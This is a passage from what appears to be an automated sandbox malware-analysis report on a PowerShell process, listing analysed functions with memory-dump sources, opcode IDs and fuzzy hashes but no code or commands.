                                                                                                                    • Opcode ID: d387f26964332311baa3c15d2e9a2367db1716a7859174b8561259c059d08384
                                                                                                                    • Instruction ID: c5854266935b609a6997aab30c47137d829a59dc902aaf491ddeab5c0a4c2731
                                                                                                                    • Opcode Fuzzy Hash: d387f26964332311baa3c15d2e9a2367db1716a7859174b8561259c059d08384
                                                                                                                    • Instruction Fuzzy Hash: A241D67180EBC44FE7569B389845A527FF0EF57360F1505EFD088CB1A3D629A849C792
                                                                                                                    Function 00007FF848EA23D8 Relevance: .1, Instructions: 102COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2211758693.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_7ff848e90000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: e2798ea1c1eed6dc8eb8a41b4cf725135e3637660cf6fa28341dfedb8e0e80d2
                                                                                                                    • Instruction ID: aad82603ed93089d94484ab9f5fd58d008540697e75c148384734aec4bdfbf55
                                                                                                                    • Opcode Fuzzy Hash: e2798ea1c1eed6dc8eb8a41b4cf725135e3637660cf6fa28341dfedb8e0e80d2
                                                                                                                    • Instruction Fuzzy Hash: D021293090CB4C4FDB5CDFAC984A7E97BE0EBA6321F04422FD448C3196DA74A44ACB91
                                                                                                                    Function 00007FF848EA7A24 Relevance: .1, Instructions: 91COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2211758693.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_7ff848e90000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 7be7c2327a1d7e9a786c77180fdb80de48f348f9baf9d41272253e9c591ef4e5
                                                                                                                    • Instruction ID: b45e29bd2984f054b2d80edc6a7ede933dcd1083f15665b68471f582759678cd
                                                                                                                    • Opcode Fuzzy Hash: 7be7c2327a1d7e9a786c77180fdb80de48f348f9baf9d41272253e9c591ef4e5
                                                                                                                    • Instruction Fuzzy Hash: DA312C3091D64E9EFBB8EF54CC1ABF932D1FF41758F400139D48D86192CB78AA86CA15
                                                                                                                    Function 00007FF848E94DB5 Relevance: .0, Instructions: 49COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2211758693.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_7ff848e90000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 13754122ee56303aa0bd232d41c911451defb90b95f11543277674a6db25f4be
                                                                                                                    • Instruction ID: 9e0e70629f37d90c611de9aa536e1da8f8236c922a5b6d99a1e5e96f4eb6d74c
                                                                                                                    • Opcode Fuzzy Hash: 13754122ee56303aa0bd232d41c911451defb90b95f11543277674a6db25f4be
                                                                                                                    • Instruction Fuzzy Hash: 3801A73010CB0C4FDB44EF0CE051AA6B3E0FB85364F10056DE58AC3651D732E882CB45
                                                                                                                    Function 00007FF849142AAD Relevance: .0, Instructions: 40COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2216479759.00007FF849140000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849140000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_7ff849140000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: b636e50e461a44c95bc3c10f4ae8cf17a054ea153956b97362c0880f0c56683d
                                                                                                                    • Instruction ID: 62a316f0e0e5bceaef778eb1cfe8f0d4a68b5879f5ef287493558b9f6869c8a0
                                                                                                                    • Opcode Fuzzy Hash: b636e50e461a44c95bc3c10f4ae8cf17a054ea153956b97362c0880f0c56683d
                                                                                                                    • Instruction Fuzzy Hash: 77F09032A0C5858FE764EB1CE8419A877F0EF49360B2404F6E15CC7567DA2AAC45CB54
                                                                                                                    Function 00007FF848EA2220 Relevance: .0, Instructions: 37COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2211758693.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_7ff848e90000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: c8279562ac59f12603e9ea715f05e518abccdf089b2c3b3032ff439a4f717301
                                                                                                                    • Instruction ID: 7fc112b6abd4648bb7525508da64f265fb981c9e732cfe7c6b3e90b9d0baa239
                                                                                                                    • Opcode Fuzzy Hash: c8279562ac59f12603e9ea715f05e518abccdf089b2c3b3032ff439a4f717301
                                                                                                                    • Instruction Fuzzy Hash: E9F0BB31C0C68D8FDB05EF3498195D57FA0FF26251F05029BE458C71A2DB759454CB92

                                                                                                                    Non-executed Functions

                                                                                                                    Function 00007FF848E9EA50 Relevance: 13.2, Strings: 10, Instructions: 688COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2211758693.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_7ff848e90000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: 0"I$8"I$I$P"I$XK_^$X"I$`"I$x"I$"I$"I
                                                                                                                    • API String ID: 0-2672293724
                                                                                                                    • Opcode ID: 1662234a8582cffb521b7f770144f8f04515e611928a43f3fffb30aa2a6fd2cf
                                                                                                                    • Instruction ID: 87c5bee508d5beed48867314f021fb866f76521096a3b22887b4677acca90a2e
                                                                                                                    • Opcode Fuzzy Hash: 1662234a8582cffb521b7f770144f8f04515e611928a43f3fffb30aa2a6fd2cf
                                                                                                                    • Instruction Fuzzy Hash: FE121A93D8E9927DE21D72BDB8450FD6B50FF813B8F0C9377D28C490878A54548686ED
                                                                                                                    Function 00007FF848E9EA43 Relevance: 12.0, Strings: 9, Instructions: 706COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2211758693.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_7ff848e90000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: 0"I$8"I$I$P"I$XK_^$X"I$x"I$"I$"I
                                                                                                                    • API String ID: 0-2532704247
                                                                                                                    • Opcode ID: f4afd9576fddef7238f3c356399567b0f95b3e732cd89916571db4959798f126
                                                                                                                    • Instruction ID: c39aacd8eee8830c08391242f5f1a34ef32932f2d0f2b292059c69a24d67f123
                                                                                                                    • Opcode Fuzzy Hash: f4afd9576fddef7238f3c356399567b0f95b3e732cd89916571db4959798f126
                                                                                                                    • Instruction Fuzzy Hash: CC120AA3E8E9927DE21DB2BDF8450FD6B50FF813B8F0C9377D24C490878A54644686E9